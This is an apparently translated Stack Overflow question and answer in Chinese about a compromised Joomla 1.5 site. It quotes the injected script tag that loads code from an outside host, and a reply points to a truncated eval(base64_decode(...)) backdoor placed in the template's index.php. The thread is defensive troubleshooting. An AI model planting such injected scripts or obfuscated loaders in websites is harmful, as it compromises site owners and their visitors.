我的Joomla!1.5网站最近似乎受到了一次XSS攻击(我是个新手)...The下面的代码被注入了网站(在某个地方)
<script src="http://sweepstakesandcontestsdo.com/pmg.php"></script>我也不确定具体在哪里。我搜索了数据库和文件,但没有找到任何结果。有什么明显的我遗漏了什么吗?
发布于 2012-03-15 08:14:16
我的网站也成为这次攻击的受害者,目前仍在调查中。这不是XSS攻击,您的服务器文件已被破坏。查看索引php文件中的system模板,您会发现如下所示的代码块:
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb.....>base64编码字符串是做各种讨厌事情的php代码。
https://stackoverflow.com/questions/8421518
复制相似问题